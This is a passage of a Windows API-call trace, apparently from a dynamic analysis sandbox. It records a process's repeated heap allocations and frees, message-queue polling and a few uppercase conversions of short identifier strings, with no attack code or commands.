hHeap=0x2af0000) returned 1 [0220.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0220.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.313] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0220.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0220.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0220.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0220.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0220.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0220.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0220.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0220.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0220.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0220.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0220.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0220.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0220.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0220.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0220.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.314] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0220.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0220.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0220.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0220.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0220.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0220.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0220.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0220.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0220.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0220.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0220.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0220.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0220.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0220.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0220.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.315] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0220.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0220.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0220.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0220.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0220.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0220.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0220.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0220.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0220.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0220.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0220.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0220.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0220.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0220.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0220.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.315] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0220.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0220.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0220.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0220.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0220.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0220.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0220.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0220.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0220.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0220.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0220.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0220.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0220.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0220.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0220.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.316] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0220.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0220.318] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0220.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0220.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0220.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab500 [0220.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0220.318] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0220.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0220.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0220.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0220.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0220.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0220.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0220.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71fe8 [0220.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0220.329] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0220.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0220.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0220.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0220.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0220.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0220.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0220.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0220.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0220.329] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0220.329] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0220.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0220.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71db8 [0220.329] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0220.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0220.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0220.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab9c8 [0220.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73e48 [0220.330] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0220.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0220.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71fe8 [0220.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0220.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0220.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0220.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0220.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0220.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0220.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0220.330] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0220.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0220.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0220.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0220.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0220.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0220.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0220.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0220.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0220.330] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0220.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0220.330] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0220.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0220.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0220.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0220.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0220.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71fe8 [0220.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0220.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0220.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0220.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0220.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0220.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0220.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0220.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73e48 | out: hHeap=0x2af0000) returned 1 [0220.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0220.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0220.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0220.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0220.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0220.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0220.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0220.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0220.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0220.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0220.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0220.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0220.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0220.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0220.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0220.332] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0220.332] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0220.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0220.332] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0220.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0220.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0220.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab7d0 [0220.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74280 [0220.332] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0220.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0220.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0220.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0220.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0220.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0220.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0220.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0220.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0220.333] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0220.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0220.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0220.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0220.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0220.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0220.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0220.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0220.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0220.333] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0220.333] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0220.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0220.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0220.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0220.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0220.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0220.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0220.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0220.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0220.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0220.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0220.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0220.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0220.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0220.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0220.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0220.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0220.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0220.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0220.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0220.334] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74280 | out: hHeap=0x2af0000) returned 1 [0220.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0220.334] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0220.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0220.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0220.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.334] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0220.334] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0220.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0220.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0220.334] HeapFree (in: hHeap=0x2af0000, 